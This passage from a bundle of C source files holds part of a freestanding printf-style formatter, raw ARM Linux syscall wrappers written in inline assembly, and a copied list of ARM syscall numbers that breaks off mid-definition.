0;\t\t/* amount to pad */\n int caps = 0;\n\n /* DEBUGP((\"value 0x%x, base %d, dosign %d, ljust %d, len %d, zpad %d\\n\",\n value, base, dosign, ljust, len, zpad )); */\n uvalue = value;\n if (dosign) {\n\tif (value < 0) {\n\t signvalue = '-';\n\t uvalue = -value;\n\t}\n }\n if (base < 0) {\n\tcaps = 1;\n\tbase = -base;\n }\n do {\n\tconvert[place++] =\n\t (caps ? \"0123456789ABCDEF\" : \"0123456789abcdef\")\n\t [uvalue % (unsigned) base];\n\tuvalue = (uvalue / (unsigned) base);\n } while (uvalue);\n convert[place] = 0;\n padlen = len - place;\n if (padlen < 0)\n\tpadlen = 0;\n if (ljust)\n\tpadlen = -padlen;\n /* DEBUGP(( \"str '%s', place %d, sign %c, padlen %d\\n\",\n convert,place,signvalue,padlen)); */\n if (zpad && padlen > 0) {\n\tif (signvalue) {\n\t dopr_outch(signvalue);\n\t --padlen;\n\t signvalue = 0;\n\t}\n\twhile (padlen > 0) {\n\t dopr_outch(zpad);\n\t --padlen;\n\t}\n }\n while (padlen > 0) {\n\tdopr_outch(' ');\n\t--padlen;\n }\n if (signvalue)\n\tdopr_outch(signvalue);\n while (place > 0)\n\tdopr_outch(convert[--place]);\n while (padlen < 0) {\n\tdopr_outch(' ');\n\t++padlen;\n }\n}\n\nstatic void dostr(char *str, int cut)\n{\n if (cut) {\n\twhile (*str && cut-- > 0)\n\t dopr_outch(*str++);\n }\n else {\n\twhile (*str)\n\t dopr_outch(*str++);\n }\n}\n\nstatic void dopr_outch(int c)\n{\n#if 0\n if (iscntrl(c) && c != '\\n' && c != '\\t') {\n\tc = '@' + (c & 0x1F);\n\tif (end == 0 || output < end)\n\t *output++ = '^';\n }\n#endif\n if (end == 0 || output < end)\n\t*output++ = c;\n}\n\n#endif\n\n" }, { "path": "stage2/syscall_arm.c", "content": "#include \"syscall_arm.h\"\n#include \"linuxdefs.h\"\n\nssize_t _read(int fd, void *buf, size_t size)\n{\n ssize_t ret;\n register int r0 asm (\"r0\") = (int)fd;\n register int r1 asm (\"r1\") = (int)buf;\n register int r2 asm (\"r2\") = (int)size;\n register int r7 asm (\"r7\") = __NR_read;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n\nssize_t _write(int fd, const void *buf, size_t size)\n{\n ssize_t ret;\n register int r0 asm (\"r0\") = (int)fd;\n register int r1 asm (\"r1\") = (int)buf;\n register int r2 asm (\"r2\") = (int)size;\n register int r7 asm (\"r7\") = __NR_write;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n\nint _open(char * path, int mode, int flags)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)path;\n register int r1 asm (\"r1\") = (int)mode;\n register int r2 asm (\"r2\") = (int)flags;\n register int r7 asm (\"r7\") = __NR_open;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n\nint _close(int fd)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)fd;\n register int r7 asm (\"r7\") = __NR_close;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0)\n );\n return ret;\n}\n\nlong _lseek(int fd, long offset, int whence)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)fd;\n register int r1 asm (\"r1\") = (int)offset;\n register int r2 asm (\"r2\") = (int)whence;\n register int r7 asm (\"r7\") = __NR_lseek;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n\nvoid * _mmap(void * start, long length, int prot, int flags, int fd, long offset)\n{\n void * ret;\n register int r0 asm (\"r0\") = (int)start;\n register int r1 asm (\"r1\") = (int)length;\n register int r2 asm (\"r2\") = (int)prot;\n register int r3 asm (\"r3\") = (int)flags;\n register int r4 asm (\"r4\") = (int)fd;\n register int r5 asm (\"r5\") = (int)offset;\n register int r7 asm (\"r7\") = __NR_mmap2;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2), \"r\"(r3), \"r\"(r4), \"r\"(r5)\n );\n return ret;\n}\n\nlong _mprotect(void * addr, long len, int prot)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)addr;\n register int r1 asm (\"r1\") = (int)len;\n register int r2 asm (\"r2\") = (int)prot;\n register int r7 asm (\"r7\") = __NR_mprotect;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n\nlong _munmap(char * start, int length)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)start;\n register int r1 asm (\"r1\") = (int)length;\n register int r7 asm (\"r7\") = __NR_munmap;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1)\n );\n return ret;\n}\n\nlong _brk(unsigned long addr)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)addr;\n register int r7 asm (\"r7\") = __NR_brk;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0)\n );\n return ret;\n}\n\nint _exit(int level)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)level;\n register int r7 asm (\"r7\") = __NR_exit;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0)\n );\n return ret;\n}\n\nvoid raise(void)\n{\n _exit(-1);\n}\n\nlong _execve(char * filename, char ** argv, char ** envp)\n{\n long ret;\n register int r0 asm (\"r0\") = (int)filename;\n register int r1 asm (\"r1\") = (int)argv;\n register int r2 asm (\"r2\") = (int)envp;\n register int r7 asm (\"r7\") = __NR_execve;\n\n asm volatile\n (\n \"swi #0; mov %0, r0\"\n : \"=r\" (ret)\n : \"r\"(r7), \"r\"(r0), \"r\"(r1), \"r\"(r2)\n );\n return ret;\n}\n" }, { "path": "stage2/syscall_arm.h", "content": "/*\n * arch/arm/include/asm/unistd.h\n *\n * Copyright (C) 2001-2005 Russell King\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License version 2 as\n * published by the Free Software Foundation.\n *\n * Please forward _all_ changes to this file to rmk@arm.linux.org.uk,\n * no matter what the change is. Thanks!\n */\n#ifndef _SYMB__ASM_ARM_UNISTD_H\n#define _SYMB__ASM_ARM_UNISTD_H\n\n#define __NR_OABI_SYSCALL_BASE\t0x900000\n\n#if defined(__thumb__) || defined(__ARM_EABI__)\n#define __NR_SYSCALL_BASE\t0\n#else\n#define __NR_SYSCALL_BASE\t__NR_OABI_SYSCALL_BASE\n#endif\n\n/*\n * This file contains the system call numbers.\n */\n\n#define __NR_restart_syscall\t\t(__NR_SYSCALL_BASE+ 0)\n#define __NR_exit\t\t\t(__NR_SYSCALL_BASE+ 1)\n#define __NR_fork\t\t\t(__NR_SYSCALL_BASE+ 2)\n#define __NR_read\t\t\t(__NR_SYSCALL_BASE+ 3)\n#define __NR_write\t\t\t(__NR_SYSCALL_BASE+ 4)\n#define __NR_open\t\t\t(__NR_SYSCALL_BASE+ 5)\n#define __NR_close\t\t\t(__NR_SYSCALL_BASE+ 6)\n\t\t\t\t\t/* 7 was sys_waitpid */\n#define __NR_creat\t\t\t(__NR_SYSCALL_BASE+ 8)\n#define __NR_link\t\t\t(__NR_SYSCALL_BASE+ 9)\n#define __NR_unlink\t\t\t(__NR_SYSCALL_BASE+ 10)\n#define __NR_execve\t\t\t(__NR_SYSCALL_BASE+ 11)\n#define __NR_chdir\t\t\t(__NR_SYSCALL_BASE+ 12)\n#define __NR_time\t\t\t(__NR_SYSCALL_BASE+ 13)\n#define __NR_mknod\t\t\t(__NR_SYSCALL_BASE+ 14)\n#define __NR_chmod\t\t\t(__NR_SYSCALL_BASE+ 15)\n#define __NR_lchown\t\t\t(__NR_SYSCALL_BASE+ 16)\n\t\t\t\t\t/* 17 was sys_break */\n\t\t\t\t\t/* 18 was sys_stat */\n#define __NR_lseek\t\t\t(__NR_SYSCALL_BASE+ 19)\n#define __NR_getpid\t\t\t(__NR_SYSCALL_BASE+ 20)\n#define __NR_mount\t\t\t(__NR_SYSCALL_BASE+ 21)\n#define __NR_umount\t\t\t(__NR_SYSCALL_BASE+ 22)\n#define __NR_setuid\t\t\t(__NR_SYSCALL_BASE+ 23)\n#define __NR_getuid\t\t\t(__NR_SYSCALL_BASE+ 24)\n#define __NR_stime\t\t\t(__NR_SYSCALL_BASE+ 25)\n#define __NR_ptrace\t\t\t(__NR_SYSCALL_BASE+ 26)\n#define __NR_alarm\t\t\t(__NR_SYSCALL_BASE+ 27)\n\t\t\t\t\t/* 28 was sys_fstat */\n#define __NR_pause\t\t\t(__NR_SYSCALL_BASE+ 29)\n#define __NR_utime\t\t\t(__NR_SYSCALL_BASE+ 30)\n\t\t\t\t\t/* 31 was sys_stty */\n\t\t\t\t\t/* 32 was sys_gtty */\n#define __NR_access\t\t\t(__NR_SYSCALL_BASE+ 33)\n#define __NR_nice\t\t\t(__NR_SYSCALL_BASE+ 34)\n\t\t\t\t\t/* 35 was sys_ftime */\n#define __NR_sync\t\t\t(__NR_SYSCALL_BASE+ 36)\n#define __NR_kill\t\t\t(__NR_SYSCALL_BASE+ 37)\n#define __NR_rename\t\t\t(__NR_SYSCALL_BASE+ 38)\n#define __NR_mkdir\t\t\t(__NR_SYSCALL_BASE+ 39)\n#define __NR_rmdir\t\t\t(__NR_SYSCALL_BASE+ 40)\n#define __NR_dup\t\t\t(__NR_SYSCALL_BASE+ 41)\n#define __NR_pipe\t\t\t(__NR_SYSCALL_BASE+ 42)\n#define __NR_times\t\t\t(__NR_SYSCALL_BASE+ 43)\n\t\t\t\t\t/* 44 was sys_prof */\n#define __NR_brk\t\t\t(__NR_SYSCALL_BASE+ 45)\n#define __NR_setgid\t\t\t(__NR_SYSCALL_BASE+ 46)\n#define __NR_getgid\t\t\t(__NR_SYSCALL_BASE+ 47)\n\t\t\t\t\t/* 48 was sys_signal */\n#define __NR_geteuid\t\t\t(__NR_SYSCALL_BASE+ 49)\n#define __NR_getegid\t\t\t(__NR_SYSCALL_BASE+ 50)\n#define __NR_acct\t\t\t(__NR_SYSCALL_BASE+ 51)\n#define __NR_umount2\t\t\t(__NR_SYSCALL_BASE+ 52)\n\t\t\t\t\t/* 53 was sys_lock */\n#define __NR_ioctl\t\t\t(__NR_SYSCALL_BASE+ 54)\n#define __NR_fcntl\t\t\t(__NR_SYSCALL_BASE+ 55)\n\t\t\t\t\t/* 56 was sys_mpx */\n#define __NR_setpgid\t\t\t(__NR_SYSCALL_BASE+ 57)\n\t\t\t\t\t/* 58 was sys_ulimit */\n\t\t\t\t\t/* 59 was sys_olduname */\n#define __NR_umask\t\t\t(__NR_SYSCALL_BASE+ 60)\n#define __NR_chroot\t\t\t(__NR_SYSCALL_BASE+ 61)\n#define __NR_ustat\t\t\t(__NR_SYSCALL_BASE+ 62)\n#define __NR_dup2\t\t\t(__NR_SYSCALL_BASE+ 63)\n#define __NR_getppid\t\t\t(__NR_SYSCALL_BASE+ 64)\n#define __NR_getpgrp\t\t\t(__NR_SYSCALL_BASE+ 65)\n#define __NR_setsid\t\t\t(__NR_SYSCALL_BASE+ 66)\n#define __NR_sigaction\t\t\t(__NR_SYSCALL_BASE+ 67)\n\t\t\t\t\t/* 68 was sys_sgetmask */\n\t\t\t\t\t/* 69 was sys_ssetmask */\n#define __NR_setreuid\t\t\t(__NR_SYSCALL_BASE+ 70)\n#define __NR_setregid\t\t\t(__NR_SYSCALL_BASE+ 71)\n#define __NR_sigsuspend\t\t\t(__NR_SYSCALL_BASE+ 72)\n#define __NR_sigpending\t\t\t(__NR_SYSCALL_BASE+ 73)\n#define __NR_sethostname\t\t(__NR_SYSCALL_BASE+ 74)\n#define __NR_setrlimit\t\t\t(__NR_SYSCALL_BASE+ 75)\n#define __NR_getrlimit\t\t\t(__NR_SYSCALL_BASE+ 76)\t/* Back compat 2GB limited rlimit */\n#define __NR_getrusage\t\t\t(__NR_SYSCALL_BASE+ 77)\n#define __NR_gettimeofday\t\t(__NR_SYSCALL_BASE+ 78)\n#define __NR_settimeofday\t\t(__NR_SYSCALL_BASE+ 79)\n#define __NR_getgroups\t\t\t(__NR_SYSCALL_BASE+ 80)\n#define __NR_setgroups\t\t\t(__NR_SYSCALL_BASE+ 81)\n#define __NR_select\t\t\t(__NR_SYSCALL_BASE+ 82)\n#define __NR_symlink\t\t\t(__NR_SYSCALL_BASE+ 83)\n\t\t\t\t\t/* 84 was sys_lstat */\n#define __NR_readlink\t\t\t(__NR_SYSCALL_BASE+ 85)\n#define __NR_uselib\t\t\t(__NR_SYSCALL_BASE+ 86)\n#define __NR_swapon\t\t\t(__NR_SYSCALL_BASE+ 87)\n#define __NR_reboot\t\t\t(__NR_SYSCALL_BASE+ 88)\n#define __NR_readdir\t\t\t(__NR_SYSCALL_BASE+ 89)\n#define __NR_mmap\t\t\t(__NR_SYSCALL_BASE+ 90)\n#define __NR_munmap\t\t\t(__NR_SYSCALL_BASE+ 91)\n#define __NR_truncate\t\t\t(__NR_SYSCALL_BASE+ 92)\n#define __NR_ftruncate\t\t\t(__NR_SYSCALL_BASE+ 93)\n#define __NR_fchmod\t\t\t(__NR_SYSCALL_BASE+ 94)\n#define __NR_fchown\t\t\t(__NR_SYSCALL_BASE+ 95)\n#define __NR_getpriority\t\t(__NR_SYSCALL_BASE+ 96)\n#define __NR_setpriority\t\t(__NR_SYSCALL_BASE+ 97)\n\t\t\t\t\t/* 98 was sys_profil */\n#define __NR_statfs\t\t\t(__NR_SYSCALL_BASE+ 99)\n#define __NR_fstatfs\t\t\t(__NR_SYSCALL_BASE+100)\n\t\t\t\t\t/* 101 was sys_ioperm */\n#define __NR_socketcall\t\t\t(__NR_SYSCALL_BASE+102)\n#define __NR_syslog\t\t\t(__NR_SYSCALL_BASE+103)\n#define __NR_setitimer\t\t\t(__NR_SYSCALL_BASE+104)\n#define __NR_getitimer\t\t\t(__NR_SYSCALL_BASE+105)\n#define __NR_stat\t\t\t(__NR_SYSCALL_BASE+106)\n#define __NR_lstat\t\t\t(__NR_SYSCALL_BASE+107)\n#define __NR_fstat\t\t\t(__NR_SYSCALL_BASE+108)\n\t\t\t\t\t/* 109 was sys_uname */\n\t\t\t\t\t/* 110 was sys_iopl */\n#define __NR_vhangup\t\t\t(__NR_SYSCALL_BASE+111)\n\t\t\t\t\t/* 112 was sys_idle */\n#define __NR_syscall\t\t\t(__NR_SYSCALL_BASE+113) /* syscall to call a syscall! */\n#define __NR_wait4\t\t\t(__NR_SYSCALL_BASE+114)\n#define __NR_swapoff\t\t\t(__NR_SYSCALL_BASE+115)\n#define __NR_sysinfo\t\t\t(__NR_SYSCALL_BASE+116)\n#define __NR_ipc\t\t\t(__NR_SYSCALL_BASE+117)\n#define __NR_fsync\t\t\t(__NR_SYSCALL_BASE+118)\n#define __NR_sigreturn\t\t\t(__NR_SYSCALL_BASE+119)\n#define __NR_clone\t\t\t(__NR_SYSCALL_BASE+120)\n#define __NR_setdomainname\t\t(__NR_SYSCALL_BASE+121)\n#define __NR_uname\t\t\t(__NR_SYSCALL_BASE+122)\n\t\t\t\t\t/* 123 was sys_modify_ldt */\n#define __NR_adjtimex\t\t\t(__NR_SYSCALL_BASE+124)\n#define __NR_mprotect\t\t\t(__NR_SYSCALL_BASE+125)\n#define __NR_sigprocmask\t\t(__NR_SYSCALL_BASE+126)\n\t\t\t\t\t/* 127 was sys_create_module */\n#define __NR_init_module\t\t(__NR_SYSCALL_BASE+128)\n#define __NR_delete_module\t\t(__NR_SYSCALL_BASE+129)\n\t\t\t\t\t/* 130 was sys_get_kernel_syms */\n#define __NR_quotactl\t\t\t(__NR_SYSCALL_BASE+131)\n#define __NR_getpgid\t\t\t(__NR_SYSCALL_BASE+132)\n#define __NR_fchdir\t\t\t(__NR_SYSCALL_BASE+133)\n#define __NR_bdflush\t\t\t(__NR_SYSCALL_BASE+134)\n#define __NR_sysfs\t\t\t(__NR_SYSCALL_BASE+135)\n#define __NR_personality\t\t(__NR_SYSCALL_BASE+136)\n\t\t\t\t\t/* 137 was sys_afs_syscall */\n#define __NR_setfsuid\t\t\t(__NR_SYSCALL_BASE+138)\n#define __NR_setfsgid\t\t\t(__NR_SYSCALL_BASE+139)\n#define __NR__llseek\t\t\t(__NR_SYSCALL_BASE+140)\n#define __NR_getdents\t\t\t(__NR_SYSCALL_BASE+141)\n#define __NR__newselect\t\t\t(__NR_SYSCALL_BASE+142)\n#define __NR_flock\t\t\t(__NR_SYSCALL_BASE+143)\n#define __NR_msync\t\t\t(__NR_SYSCALL_BASE+144)\n#define __NR_readv\t\t\t(__NR_SYSCALL_BASE+145)\n#define __NR_writev\t\t\t(__NR_SYSCALL_BASE+146)\n#define __NR_getsid\t\t\t(__NR_SYSCALL_BASE+147)\n#define __NR_fdatasync\t\t\t(__NR_SYSCALL_BASE+148)\n#define __NR__sysctl\t\t\t(__NR_SYSCALL_BASE+149)\n#define __NR_mlock\t\t\t(__NR_SYSCALL_BASE+150)\n#define __NR_munlock\t\t\t(__NR_SYSCALL_BASE+151)\n#define __NR_mlockall\t\t\t(__NR_SYSCALL_BASE+152)\n#define __NR_munlockall\t\t\t(__NR_SYSCALL_BASE+153)\n#define __NR_sched_setparam\t\t(__NR_SYSCALL_BASE+154)\n#define __NR_sched_getparam\t\t(__NR_SYSCALL_BASE+155)\n#define __NR_sched_setscheduler\t\t(__NR_SYSCALL_BASE+156)\n#define __NR_sched_getscheduler\t\t(__NR_SYSCALL_BASE+157)\n#define __NR_sched_yield\t\t(__NR_SYSCALL_BASE+158)\n#define __NR_sched_get_priority_max\t(__NR_SYSCALL_BASE+159)\n#define __NR_sched_get_priority_min\t(__NR_SYSCALL_BASE+160)\n#define __NR_sched_rr_get_interval\t(__NR_SYSCALL_BASE+161)\n#define __NR_nanosleep\t\t\t(__NR_SYSCALL_BASE+162)\n#define __NR_mremap\t\t\t(__NR_SYSCALL_BASE+163)\n#define __NR_setresuid\t\t\t(__NR_SYSCALL_BASE+164)\n#define __NR_getresuid\t\t\t(__NR_SYSCALL_BASE+165)\n\t\t\t\t\t/* 166 was sys_vm86 */\n\t\t\t\t\t/* 167 was sys_query_module */\n#define __NR_poll\t\t\t(__NR_SYSCALL_BASE+168)\n#define __NR_nfsservctl\t\t\t(__NR_SYSCALL_BASE+169)\n#define __NR_setresgid\t\t\t(__NR_SYSCALL_BASE+170)\n#define __NR_getresgid\t\t\t(__NR_SYSCALL_BASE+171)\n#define __NR_prctl\t\t\t(__NR_SYSCALL_BASE+172)\n#define __NR_rt_sigreturn\t\t(__NR_SYSCALL_BASE+173)\n#define __NR_rt_sigaction\t\t(__NR_SYSCALL_BASE+174)\n#define __NR_rt_sigprocmask\t\t(__NR_SYSCALL_BASE+175)\n#define __NR_rt_sigpending\t\t(__NR_SYSCALL_BASE+176)\n#define __NR_rt_sigtimedwait\t\t(__NR_SYSCALL_BASE+177)\n#define __NR_rt_sigqueueinfo\t\t(__NR_SYSCALL_BASE+178)\n#define __NR_rt_sigsuspend\t\t(__NR_SYSCALL_BASE+179)\n#define __NR_pread64\t\t\t(__NR_SYSCALL_BASE+180)\n#define __NR_pwrite64\t\t\t(__NR_SYSCALL_BASE+181)\n#define __NR_chown\t\t\t(__NR_SYSCALL_BASE+182)\n#define __NR_getcwd\t\t\t(__NR_SYSCALL_BASE+183)\n#define __NR_capget\t\t\t(__NR_SYSCALL_BASE+184)\n#define __NR_capset\t\t\t(__NR_SYSCALL_BASE+185)\n#define __NR_sigaltstack\t\t(__NR_SYSCALL_BASE+186)\n#define __NR_sendfile\t\t\t(__NR_SYSCALL_BASE+187)\n\t\t\t\t\t/* 188 reserved */\n\t\t\t\t\t/* 189 reserved */\n#define __NR_vfork\t\t\t(__NR_SYSCALL_BASE+190)\n#define __NR_ugetrlimit\t\t\t(__NR_SYSCALL_BASE+191)\t/* SuS compliant getrlimit */\n#define __NR_mmap2\t\t\t(__NR_SYSCALL_BASE+192)\n#define __NR_truncate64\t\t\t(__NR_SYSCALL_BASE+193)\n#define __NR_ftruncate64\t\t(__NR_SYSCALL_BASE+194)\n#define __NR_stat64\t\t\t(__NR_SYSCALL_BASE+195)\n#define __NR_lstat64\t\t\t(__NR_SYSCALL_BASE+196)\n#define __NR_fstat64\t\t\t(__NR_SYSCALL_BASE+197)\n#define __NR_lchown32\t\t\t(__NR_SYSCALL_BASE+198)\n#define __NR_getuid32\t\t\t(__NR_SYSCALL_BASE+199)\n#define __NR_getgid32\t\t\t(__NR_SYSCALL_BASE+200)\n#define __NR_geteuid32\t\t\t(__NR_SYSCALL_BASE+201)\n#define __NR_getegid32\t\t\t(__NR_SYSCALL_BASE+202)\n#define __NR_setreuid32\t\t\t(__NR_SYSCALL_BASE+203)\n#define __NR_setregid32\t\t\t(__NR_SYSCALL_BASE+204)\n#define __NR_getgroups32\t\t(__NR_SYSCALL_BASE+205)\n#define __NR_setgroups32\t\t(__NR_SYSCALL_BASE+206)\n#define __NR_fchown32\t\t\t(__NR_SYSCALL_BASE+207)\n#define __NR_setresuid32\t\t(__NR_SYSCALL_BASE+208)\n#define __NR_getresuid32\t\t(__NR_SYSCALL_BASE+209)\n#define __NR_setresgid32\t\t(__NR_SYSCALL_BASE+210)\n#define __NR_getresgid32\t\t(__NR_SYSCALL_BASE+211)\n#define __NR_chown32\t\t\t(__NR_SYSCALL_BASE+212)\n#define __NR_setuid32\t\t\t(__NR_SYSCALL_BASE+213)\n#define __NR_setgid32\t\t\t(__NR_SYSCALL_BASE+214)\n#define __NR_setfsuid32\t\t\t(__NR_SYSCALL_BASE+215)\n#define __NR_setfsgid32\t\t\t(__NR_SYSCALL_BASE+216)\n#define __NR_getdents64\t\t\t(__NR_SYSCALL_BASE+217)\n#define __NR_pivot_root\t\t\t(__NR_SYSCALL_BASE+218)\n#define __NR_mincore\t\t\t(__NR_SYSCALL_BASE+219)\n#define __NR_madvise\t\t\t(__NR_SYSCALL_BASE+220)\n#define __NR_fcntl64\t\t\t(__NR_SYSCALL_BASE+221)\n\t\t\t\t\t/* 222 for tux */\n\t\t\t\t\t/* 223 is unused */\n#define __NR_gettid\t\t\t(__NR_SYSCALL_BASE+224)\n#define __NR_readahead\t\t\t(__NR_SYSCALL_BASE+225)\n#define __NR_setxattr\t\t\t(__NR_SYSCALL_BASE+226)\n#define __NR_lsetxattr\t\t\t(__NR_SYSCALL_BASE+227)\n#define __NR_fsetxattr\t\t\t(__NR_SYSCALL_BASE+228)\n#define __NR_getxattr\t\t\t(__NR_SYSCALL_BASE+229)\n#define __NR_lgetxattr\t\t\t(__NR_SYSCALL_BASE+230)\n#define __NR_fgetxattr\t\t\t(__NR_SYSCALL_BASE+231)\n#define __NR_listxattr\t\t\t(__NR_SYSCALL_BASE+232)\n#define __NR_llistxattr\t\t\t(__NR_SYSCALL_BASE+233)\n#define __NR_flistxattr\t\t\t(__NR_SYSCALL_BASE+234)\n#define __NR_removexattr\t\t(__NR_SYSCALL_BASE+235)\n#define __NR_lremovexattr\t\t(__NR_SYSCALL_BASE+236)\n#define __NR_fremovexattr\t\t(__NR_SYSCALL_BASE+237)\n#define __NR_tkill\t\t\t(__NR_SYSCALL_BASE+238)\n#define __NR_sendfile64\t\t\t(__NR_SYSCALL_BASE+239)\n#define __NR_futex\t\t\t(__NR_SYSCALL_BASE+240)\n#define __NR_sched_setaffinity\t\t(__NR_SYSCALL_BASE+241)\n#define __NR_sched_getaffinity\t\t(__NR_SYSCALL_BASE+242)\n#define __NR_io_setup\t\t\t(__NR_SYSCALL_BASE+243)\n#define __NR_io_destroy\t\t\t(__NR_SYSCALL_BASE+244)\n#define __NR_io_getevents\t\t(__NR_SYSCALL_BASE+245)\n#define __NR_io_submit\t\t\t(__NR_SYSCALL_BASE+246)\n#define __NR_io_cancel\t\t\t(__NR_SYSCALL_BASE+247)\n#define __NR_exit_group\t\t\t(__NR_SYSCALL_BASE+248)\n#define __NR_lookup_dcookie\t\t(__NR_SYSCALL_BASE+249)\n#define __NR_epoll_create\t\t(__NR_SYSCALL_BASE+250)\n#define __NR_epoll_ctl\t\t\t(__NR_SYSCALL_BASE+251)\n#define __NR_epoll_wait\t\t\t(__NR_SYSCALL_BASE+252)\n#define __NR_remap_file_pages\t\t(__NR_SYSCALL_BASE+253)\n\t\t\t\t\t/* 254 for set_thread_area */\n\t\t\t\t\t/* 255 for get_thread_area */\n#define __NR_set_tid_address\t\t(__NR_SYSCALL_BASE+256)\n#define __NR_timer_create\t\t(__NR_SYSCALL_BASE+257)\n#define __NR_timer_settime\t\t(__NR_SYSCALL_BASE+258)\n#define __NR_timer_gettime\t\t(__NR_SYSCALL_BASE+259)\n#define __NR_timer_getoverrun\t\t(__NR_SYSCALL_BASE+260)\n#define __NR_timer_delete\t\t(__NR_SYSCALL_BASE+261)\n#define __NR_clock_settime\t\t(__NR_SYSCALL_BASE+262)\n#define __NR_clock_gettime\t\t(__NR_SYSCALL_BASE+263)\n#define __NR_clock_getres\t\t(__NR_SYSCALL_BASE+264)\n#define __NR_clock_nanosleep\t\t(__NR_SYSCALL_BASE+265)\n#define __NR_statfs64\t\t\t(__NR_SYSCALL_BASE+266)\n#define __NR_fstatfs64\t\t\t(__NR_SYSCALL_BASE+267)\n#define __NR_tgkill\t\t\t(__NR_SYSCALL_BASE+268)\n#define __NR_utimes\t\t\t(__NR_SYSCALL_BASE+269)\n#define __NR_arm_fadvise64_64\t\t(__NR_SYSCALL_BASE+270)\n#define __NR_pciconfig_iobase\t\t(__NR_SYSCALL_BASE+271)\n#define __NR_pciconfig_read\t\t(__NR_SYSCALL_BASE+272)\n#define __NR_pciconfig_write\t\t(__NR_SYSCALL_BASE+273)\n#define __NR_mq_open\t\t\t(__NR_SYSCALL_BASE+274)\n#define __NR_mq_unlink\t\t\t(__NR_SYSCALL_BASE+275)\n#define __NR_mq_timedsend\t\t(__NR_SYSCALL_BASE+276)\n#define __NR_mq_timedreceive\t\t(__NR_SYSCALL_BASE+277)\n#define __NR_mq_notify\t\t\t(__NR_SYSCALL_BASE+278)\n#define __NR_mq_getsetattr\t\t(__NR_SYSCALL_BASE+279)\n#define __NR_waitid\t\t\t(__NR_SYSCALL_BASE+280)\n#define __NR_socket\t\t\t(__NR_SYSCALL_BASE+281)\n#define __NR_bind\t\t\t(__NR_SYSCALL_BASE+282)\n#define __NR_connect\t\t\t(__NR_SYSCALL_BASE+283)\n#define __NR_listen\t\t\t(__NR_SYSCALL_BASE+284)\n#define __NR_accept\t\t\t(__NR_SYSCALL_BASE+285)\n#define __NR_getsockname\t\t(__NR_SYSCALL_BASE+286)\n#define __NR_getpeername\t\t(__NR_SYSCALL_BASE+287)\n#define __NR_socketpair\t\t\t(__NR_SYSCALL_BASE+288)\n#define __NR_send\t\t\t(__NR_SYSCALL_BASE+289)\n#define __NR_sendto\t\t\t(__NR_SYSCALL_BASE+290)\n#define __NR_recv\t\t\t(__NR_SYSCALL_BASE+291)\n#define __NR_recvfrom\t\t\t(__NR_SYSCALL_BASE+292)\n#define __NR_shutdown\t\t\t(__NR_SYSCALL_BASE+293)\n#define __NR_setsockopt\t\t\t(__NR_SYSCALL_BASE+294)\n#define __NR_getsockopt\t\t\t(__NR_SYSCALL_BASE+295)\n#define __NR_sendmsg\t\t\t(__NR_SYSCALL_BASE+296)\n#define __NR_recvmsg\t\t\t(__NR_SYSCALL_BASE+297)\n#define __NR_semop\t\t\t(__NR_SYSCALL_BASE+298)\n#define __NR_semget\t\t\t(__NR_SYSCALL_BASE+299)\n#define __NR_semctl\t\t\t(__NR_SYSCALL_BASE+300)\n#define __NR_msgsnd\t\t\t(__NR_SYSCALL_BASE+301)\n#define __NR_msgrcv\t\t\t(__NR_SYSCALL_BASE+302)\n#define __NR_msgget\t\t\t(__NR_SYSCALL_BASE+303)\n#define __NR_msgctl\t\t\t(__NR_SYSCALL_BASE+304)\n#define __NR_shmat\t\t\t(__NR_SYSCALL_BASE+305)\n#define __NR_shmdt\t\t\t(__NR_SYSCALL_BASE+306)\n#define __NR_shmget\t\t\t(__NR_SYSCALL_BASE+307)\n#define __NR_shmctl\t\t\t(__NR_SYSCALL_BASE+308)\n#define __NR_add_key\t\t\t(__NR_SYSCALL_BASE+309)\n#define __NR_request_key\t\t(__NR_SYSCALL_BASE+310)\n#define __NR_keyctl\t\t\t(__NR_SYSCALL_BASE+311)\n#define __NR_semtimedop\t\t\t(__NR_SYSCALL_BASE+312)\n#define __NR_vserver\t\t\t(__NR_SYSCALL_BASE+313)\n#define __NR_ioprio_set\t\t\t(__NR_SYSCALL_BASE+314)\n#define __NR_ioprio_get\t\t\t(__NR_SYSCALL_BASE+315)\n#define __NR_inotify_init\t\t(__NR_SYSCALL_BASE+316)\n#define __NR_inotify_add_watch\t\t(__NR_SYSCALL_BASE+317)\n#define __NR_inotify_rm_watch\t\t(__NR_SYSCALL_BASE+318)\n#define __NR_mbind\t\t\t(__NR_SYSCALL_BASE+319)\n#define __NR_get_mempolicy\t\t(__NR_SYSCALL_BASE+320)\n#define 